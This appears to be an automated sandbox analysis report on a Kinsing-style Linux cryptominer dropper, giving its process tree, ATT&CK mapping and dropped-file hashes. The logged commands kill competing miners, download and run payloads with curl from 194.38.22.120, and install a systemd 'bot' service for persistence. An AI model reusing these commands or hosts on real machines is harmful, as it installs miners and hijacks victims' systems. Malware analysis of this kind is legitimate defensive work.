- /usr/bin/pkill
  pkill -f kthreaddo
  2⤵
  - Reads CPU attributes
  PID:1453
- /usr/bin/pkill
  pkill -f donkey
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1454
- /usr/bin/pkill
  pkill -f sysupdater
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1456
- /usr/bin/pkill
  pkill -f php-update.service
  2⤵
  - Reads CPU attributes
  PID:1458
- /usr/bin/pkill
  pkill -f update-setup
  2⤵
  - Reads CPU attributes
  PID:1459
- /bin/grep
  grep :1414
  2⤵
  PID:1461
- /bin/grep
  grep -v -
  2⤵
  PID:1464
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1465
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1462
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1463
- /bin/grep
  grep rtw88_pcied
  2⤵
  PID:1467
- /bin/grep
  grep -v grep
  2⤵
  PID:1468
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:1469
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1470
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1466
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1471
- /bin/grep
  grep stratum
  2⤵
  PID:1472
- /bin/grep
  grep -v grep
  2⤵
  PID:1473
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:1474
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1475
- /bin/grep
  grep Sofia
  2⤵
  PID:1477
- /bin/grep
  grep -v grep
  2⤵
  PID:1478
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1476
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:1479
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1480
- /usr/bin/pkill
  pkill -f Sofia
  2⤵
  - Reads CPU attributes
  PID:1481
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1482
- /bin/grep
  grep tracepath
  2⤵
  PID:1483
- /bin/grep
  grep -v grep
  2⤵
  PID:1484
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1485
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1486
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1487
- /bin/grep
  grep /dot
  2⤵
  PID:1488
- /bin/grep
  grep -v grep
  2⤵
  PID:1489
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1490
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1491
- /bin/grep
  grep "php-fpm pool www"
  2⤵
  PID:1493
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1492
- /bin/grep
  grep -v grep
  2⤵
  PID:1494
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1496
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1495
- /bin/grep
  grep "Cli start accept"
  2⤵
  PID:1498
- /bin/grep
  grep -v grep
  2⤵
  PID:1499
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1497
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1500
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1501
- /bin/grep
  grep "bash -k"
  2⤵
  PID:1503
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1502
- /bin/grep
  grep -v grep
  2⤵
  PID:1504
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1505
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1506
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1507
- /bin/grep
  grep -v grep
  2⤵
  PID:1509
- /bin/grep
  grep perfctl
  2⤵
  PID:1508
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1510
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1511
- /usr/bin/pkill
  pkill -f hezb
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1512
- /usr/bin/pkill
  pkill -f /tmp/.out
  2⤵
  - Reads CPU attributes
  PID:1513
- /bin/grep
  grep ./ll1
  2⤵
  PID:1515
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1514
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1518
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1517
- /bin/grep
  grep -v grep
  2⤵
  PID:1516
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1519
- /bin/grep
  grep agetty
  2⤵
  PID:1520
- /bin/grep
  grep -v grep
  2⤵
  PID:1521
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:1522
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1523
- /usr/bin/pkill
  pkill -f 42.112.28.216
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1524
- /bin/grep
  grep 207.38.87.6
  2⤵
  PID:1526
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1528
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1527
- /bin/grep
  grep -v -
  2⤵
  PID:1529
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1530
- /bin/grep
  grep 23.94.214.119
  2⤵
  PID:1532
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1534
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1533
- /bin/grep
  grep -v -
  2⤵
  PID:1535
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1536
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1539
- /bin/grep
  grep 127.0.0.1:52018
  2⤵
  PID:1538
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1540
- /bin/grep
  grep -v -
  2⤵
  PID:1541
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1542
- /bin/grep
  grep 34.81.218.76:9486
  2⤵
  PID:1544
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1545
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1546
- /bin/grep
  grep -v -
  2⤵
  PID:1547
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1548
- /bin/grep
  grep 42.112.28.216:9486
  2⤵
  PID:1550
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1551
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1552
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1554
- /bin/grep
  grep -v -
  2⤵
  PID:1553
- /usr/bin/pkill
  pkill -f .git/kthreaddw
  2⤵
  - Reads CPU attributes
  PID:1555
- /usr/bin/pkill
  pkill -f 80.211.206.105
  2⤵
  - Reads CPU attributes
  PID:1556
- /usr/bin/pkill
  pkill -f 207.38.87.6
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1557
- /usr/bin/pkill
  pkill -f p8444
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1558
- /usr/bin/pkill
  pkill -f supportxmr
  2⤵
  - Reads CPU attributes
  PID:1559
- /usr/bin/pkill
  pkill -f monero
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1560
- /usr/bin/pkill
  pkill -f kthreaddi
  2⤵
  - Reads CPU attributes
  PID:1561
- /usr/bin/pkill
  pkill -f srv00
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1562
- /usr/bin/pkill
  pkill -f /tmp/.javae/javae
  2⤵
  - Reads CPU attributes
  PID:1563
- /usr/bin/pkill
  pkill -f .javae
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1564
- /usr/bin/pkill
  pkill -f .syna
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1565
- /usr/bin/pkill
  pkill -f xmm
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1566
- /usr/bin/pkill
  pkill -f solr.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1567
- /usr/bin/pkill
  pkill -f /tmp/.solr/solrd
  2⤵
  - Reads CPU attributes
  PID:1568
- /usr/bin/pkill
  pkill -f /tmp/javac
  2⤵
  - Reads CPU attributes
  PID:1569
- /usr/bin/pkill
  pkill -f /tmp/.go.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1570
- /usr/bin/pkill
  pkill -f /tmp/.x/agetty
  2⤵
  - Reads CPU attributes
  PID:1571
- /usr/bin/pkill
  pkill -f /tmp/.x/kworker
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1572
- /usr/bin/pkill
  pkill -f c3pool
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1573
- /usr/bin/pkill
  pkill -f /tmp/.X11-unix/gitag-ssh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1574
- /usr/bin/pkill
  pkill -f /tmp/1
  2⤵
  - Reads CPU attributes
  PID:1575
- /usr/bin/pkill
  pkill -f /tmp/okk.sh
  2⤵
  - Reads CPU attributes
  PID:1576
- /usr/bin/pkill
  pkill -f /tmp/gitaly
  2⤵
  PID:1577
- /usr/bin/pkill
  pkill -f /tmp/.x/kworker
  2⤵
  - Reads CPU attributes
  PID:1578
- /usr/bin/pkill
  pkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB
  2⤵
  - Reads CPU attributes
  PID:1579
- /usr/bin/pkill
  pkill -f /tmp/.X11-unix/supervise
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1580
- /usr/bin/pkill
  pkill -f /tmp/.ssh/redis.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1581
- /bin/grep
  grep ./udp
  2⤵
  PID:1583
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1582
- /bin/grep
  grep -v grep
  2⤵
  PID:1584
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1585
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1586
- /bin/sed
  sed -i "s/^0//" /tmp/.X11-unix/01
  2⤵
  - Attempts to change immutable files
  PID:1587
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1589
- /bin/cat
  cat /tmp/.X11-unix/01
  2⤵
  PID:1588
- /bin/sed
  sed -i "s/^0//" /tmp/.X11-unix/11
  2⤵
  - Attempts to change immutable files
  PID:1590
- /bin/cat
  cat /tmp/.X11-unix/11
  2⤵
  PID:1591
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1592
- /bin/sed
  sed -i "s/^0//" /tmp/.X11-unix/22
  2⤵
  - Attempts to change immutable files
  PID:1593
- /bin/cat
  cat /tmp/.X11-unix/22
  2⤵
  PID:1594
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1595
- /bin/sed
  sed -i "s/^0//" /tmp/.systemd.1
  2⤵
  - Attempts to change immutable files
  PID:1596
- /bin/cat
  cat /tmp/.systemd.1
  2⤵
  PID:1597
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1598
- /bin/sed
  sed -i "s/^0//" /tmp/.systemd.2
  2⤵
  - Attempts to change immutable files
  PID:1599
- /bin/cat
  cat /tmp/.systemd.2
  2⤵
  PID:1600
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1601
- /bin/sed
  sed -i "s/^0//" /tmp/.systemd.3
  2⤵
  - Attempts to change immutable files
  PID:1602
- /bin/cat
  cat /tmp/.systemd.3
  2⤵
  PID:1603
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1604
- /bin/cat
  cat /tmp/.systemd.1
  2⤵
  PID:1605
- /bin/cat
  cat /tmp/.systemd.2
  2⤵
  PID:1606
- /bin/cat
  cat /tmp/.systemd.3
  2⤵
  PID:1607
- /bin/sed
  sed -i "s/^0//" /tmp/.pg_stat.0
  2⤵
  - Attempts to change immutable files
  PID:1608
- /bin/cat
  cat /tmp/.pg_stat.0
  2⤵
  PID:1609
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1610
- /bin/sed
  sed -i "s/^0//" /tmp/.pg_stat.1
  2⤵
  - Attempts to change immutable files
  PID:1611
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1613
- /bin/cat
  cat /tmp/.pg_stat.1
  2⤵
  PID:1612
- /bin/sed
  sed -i "s/^0//" /data/./oka.pid
  2⤵
  - Attempts to change immutable files
  PID:1614
- /bin/cat
  cat /data/./oka.pid
  2⤵
  PID:1615
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1616
- /bin/sed
  sed -i "s/^0//" /tmp/.ICE-unix/d
  2⤵
  - Attempts to change immutable files
  PID:1617
- /bin/cat
  cat /tmp/.ICE-unix/d
  2⤵
  PID:1618
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1619
- /bin/sed
  sed -i "s/^0//" /tmp/.ICE-unix/m
  2⤵
  - Attempts to change immutable files
  PID:1620
- /bin/cat
  cat /tmp/.ICE-unix/m
  2⤵
  PID:1621
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1622
- /usr/bin/pkill
  pkill -f zsvc
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1623
- /usr/bin/pkill
  pkill -f pdefenderd
  2⤵
  - Reads CPU attributes
  PID:1624
- /usr/bin/pkill
  pkill -f updatecheckerd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1625
- /usr/bin/pkill
  pkill -f cruner
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1626
- /usr/bin/pkill
  pkill -f dbused
  2⤵
  - Reads runtime system information
  PID:1627
- /usr/bin/pkill
  pkill -f bashirc
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1628
- /usr/bin/pkill
  pkill -f meminitsrv
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1629
- /bin/grep
  grep ./oka
  2⤵
  PID:1631
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1630
- /bin/grep
  grep -v grep
  2⤵
  PID:1632
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1633
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1634
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1635
- /bin/grep
  grep "postgres: autovacum"
  2⤵
  PID:1636
- /bin/grep
  grep -v grep
  2⤵
  PID:1637
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1638
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1639
- /usr/bin/awk
  awk "length(\$1) == 8"
  2⤵
  PID:1641
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1640
- /bin/grep
  grep -v bin
  2⤵
  PID:1642
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1643
- /bin/grep
  grep -v "("
  2⤵
  PID:1644
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1645
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1646
- /bin/grep
  grep -v postgres
  2⤵
  PID:1647
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1648
- /bin/grep
  grep -v kinsing
  2⤵
  PID:1649
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1650
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1651
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1652
- /usr/bin/awk
  awk "length(\$1) == 16"
  2⤵
  PID:1653
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1655
- /bin/grep
  grep -v bin
  2⤵
  PID:1654
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1657
- /bin/grep
  grep -v "("
  2⤵
  PID:1656
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1658
- /bin/grep
  grep -v postgres
  2⤵
  PID:1659
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1660
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1661
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1662
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  PID:1663
- /bin/grep
  grep -v bin
  2⤵
  PID:1665
- /usr/bin/awk
  awk "length(\$5) == 8"
  2⤵
  PID:1664
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1666
- /bin/grep
  grep -v "("
  2⤵
  PID:1667
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1668
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1669
- /bin/grep
  grep -v postgres
  2⤵
  PID:1670
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1671
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:1672
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1673
- /bin/grep
  grep -v grep
  2⤵
  PID:1675
- /bin/grep
  grep /tmp/sscks
  2⤵
  PID:1676
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1674
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1677
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1678
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:1682
- /usr/bin/md5sum
  md5sum /etc/data/kinsing
  2⤵
  PID:1681
- /bin/rm
  rm -rf /etc/data/kinsing
  2⤵
  PID:1683
- /bin/chmod
  chmod 777 /etc/data/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:1684
- /usr/bin/curl
  curl -o /etc/data/kinsing http://194.38.22.120/kinsing
  2⤵
  PID:1685
- /bin/chmod
  chmod +x /etc/data/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:1686
- /usr/bin/md5sum
  md5sum /etc/data/kinsing
  2⤵
  PID:1689
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:1690
- /usr/bin/md5sum
  md5sum /etc/data/libsystem.so
  2⤵
  PID:1693
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:1694
- /bin/chmod
  chmod 777 /etc/data/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:1695
- /usr/bin/curl
  curl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so
  2⤵
  PID:1696
- /bin/chmod
  chmod +x /etc/data/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:1697
- /usr/bin/md5sum
  md5sum /etc/data/libsystem.so
  2⤵
  PID:1700
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:1701
- /bin/chmod
  chmod 777 /etc/data/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:1702
- /usr/bin/curl
  curl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so
  2⤵
  PID:1703
- /bin/chmod
  chmod +x /etc/data/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:1704
- /usr/bin/md5sum
  md5sum /etc/data/libsystem.so
  2⤵
  PID:1707
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:1708
- /bin/rm
  rm -rf /tmp/kdevtmpfsi
  2⤵
  PID:1709
- /bin/chmod
  chmod 777 /etc/data/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:1710
- /bin/chmod
  chmod +x /etc/data/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:1711
- /etc/data/kinsing
  /etc/data/kinsing
  2⤵
  PID:1712
- /usr/bin/id
  id -u
  2⤵
  PID:1714
- /bin/systemctl
  systemctl enable bot
  2⤵
  - Enumerates kernel/hardware configuration
  PID:1715

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Shared Modules

T1129

Persistence

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

T1574.006

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

T1574.006

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

T1574.006

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/data/kinsing

Filesize
5.7MB

MD5
b3039abf2ad5202f4a9363b418002351

SHA1
0ceb8ffb0be23b808b534d744440f4367e17b9c5

SHA256
787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c

SHA512
8b1a1003a021d0f69b9295f496bf550932ce85b096ca7057632756348da1354c2b104ff36e901b27def030b79749c8fc7f54163d6195e5e0cb9b357353ee654e

Download Submit
/etc/data/libsystem.so

Filesize
26KB

MD5
ccef46c7edf9131ccffc47bd69eb743b

SHA1
38c56b5e1489092b80c9908f04379e5a16876f01

SHA256
c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

SHA512
da452f1022e7ba6e5b958d39d3e5d0418339d55bf8b2ad8cfc9e25a43ad61b6e992df9df97b75d64a22a5b8dde35308f4934d7b0c591bb460526bf24ead808cc

Download Submit
/lib/systemd/system/bot.service

Filesize
198B

MD5
40d800480894888e7b6abd3c91625348

SHA1
dc97c4c45b5fa7c51572e47a36bf63f5ba908e08

SHA256
90a16951a40101be4cb3e2c55c0a8de710e0e744e7cae003483fa3f825ea67f4

SHA512
634f058551676a3d2b8ef126d975da66a8735c089aa4dcec8bd9cc5cd344fde66c445bd9677349fefefc6b7b2e80ad0cb95a585ad5d6f9b7ca7aa6f026ce4857

Download Submit
/var/mail/user

Filesize
825B

MD5
aba125fd49bac2a580527f34adc28c54

SHA1
25c46546f03249f632e8120a8dda92725744213d

SHA256
5ffe4e7b4452799fbee1c285ac1a94b5899d59bcaabba50935ea55d386abccb1

SHA512
311fba7d387055945378df42ba54b2c1880ac33c396a1b2192dbef70cae58b1689e97f5703ea7882ab29cca9e44182a846caa9b85276cb98ab38079dc2c14fcd

Download Submit
/var/mail/user

Filesize
1KB

MD5
5e8a0247c9b8e8dc3aca2f38dee66f38

SHA1
069cf2163c319dd9b8c8f2ae6550fc9115e7473c

SHA256
4348220ec64d8694b4e35b833dc044d82dd14384627dc3ec068a3e670a9ba04b

SHA512
238700f1a9829c7117b0bb2b88e91e032e258d337d0d90351f7c2e6aaa645e01598a1ba352122e63995c8c92a820d697f246b18ae12a8cd77bc6544d4ad4b339

Download Submit
/var/spool/exim4/input/1tmO06-0000N9-VT-D

Filesize
128B

MD5
a1f695caaa23e09bc69661280c0a3344

SHA1
074d0847b71008ed8dc780e2efabcc56e1f1f7a1

SHA256
0719510fd3ed13924ebb349ef14455c505e4c30c5b53f8757af391efcd913c66

SHA512
8466ba8b733333da9e244abaeef7c3f413b0795b6bc601e1a1f7f023fd8ee8ef46ab4e9114489b608c80509f7f19531716b2c93e344acbd5139ccf29b83b8fe6

Download Submit
/var/spool/exim4/input/1tmO06-0000N9-VT-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/1tmO06-0000NC-Vo-D

Filesize
146B

MD5
1e5e8ec318f1fd422df0de622116c08d

SHA1
ac29764fee88cd9a9dfae2557863c701b8073242

SHA256
860b8a00254fce2002d042bfa390e9f04306223f51538befc879614a9b7ae6a1

SHA512
09b4fa2c4dd4ca6680d5069fb675283650ca73130f8b9614cc6f154463314e29cda039bc79d801c450967b3f64a2f22fb8a9d5086c46c2619682c68337e07da5

Download Submit
/var/spool/exim4/input/hdr.1438

Filesize
915B

MD5
ccdd3714f1312fb82ffbd1767889fcd3

SHA1
b0ebc43c76545332f2dca3bec3c0df36c36d20cb

SHA256
3c3f0195a7f3c2f930374bbd36a45572d83128815b930bb7f720ca0740bc0679

SHA512
162544e164f8b0fbf41d01013220f4f82e983f66fe4bc37ccb5036eef0bc54e134470b24c41567a635e0ec3c3af7a3590beea853051d86b376ab0dc18978de6f

Download Submit
/var/spool/exim4/msglog/1tmO06-0000N9-VT

Filesize
288B

MD5
3ac9b94cb8ce9b000260b1ab972dfcc6

SHA1
94f2431057952fd39370773ee5a5d4c32d3f4571

SHA256
5cf564a6c6c3347db73feac704ce17788f944f2b1bdacb1a61555791705113fe

SHA512
6875e4914d31ce5a0a81f9e173bfe5e3d3a3dd7bca7da61e22bd232ed2be907f6e6530232d990054cb6b81c94b898ed2dd675b4d0df67692b84f10b45cc8bfe3

Download Submit
/var/spool/exim4/msglog/1tmO06-0000N9-VT

Filesize
89B

MD5
1a703154ee3f5afd8cb796d89f93bbbf

SHA1
4a652f976a2476b21e230918ef8544ceb5133aff

SHA256
932c13acc6983210ea509176ccfd55661d571a8ff5fc301251df62060a2fdca0

SHA512
fccd5baabdeac97c367711b9c41b9d6b0944ad87951bd85c730a121ede0d2791af137514c62aa4f7ac125ca74b23774d35fba8d6a71d737a4634ece72ae83059

Download Submit
/var/spool/exim4/msglog/1tmO06-0000NC-Vo

Filesize
288B

MD5
ec59b6eb0952057ffe7f7178bdc1b63e

SHA1
0821fb22f2a0f328a48215faa6073c7f6a6eba7e

SHA256
6b99c042fe59fe4a448623d2b86a2c090823fbec06279ae2f103fa9732f950cc

SHA512
d7571e29c3c5d3b33e8e448f127915a676745699c4d6260b6188a830976b262c7321e671ec2dc4c603f00f0f65a5f8fefee68a04bdd8a49287f99d528395e35b

Download Submit
/var/spool/exim4/msglog/1tmO06-0000NC-Vo

Filesize
89B

MD5
d1309d5201cbb0bdf21fdcad12ca8dbe

SHA1
10f65c7a6ca83b0261dbd6039975060805466cea

SHA256
e5097fad7f57b378970b98f0514cd6c86d72d0830982403c67f8e280a02b3c93

SHA512
a8db7bb807626bffdc721cf375abb96b2cb8029e313c68510928312ee7b9c93aca45caed5fc57269d0103560fda8b74800ef68f101488ef16237d8b0efac12cb

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads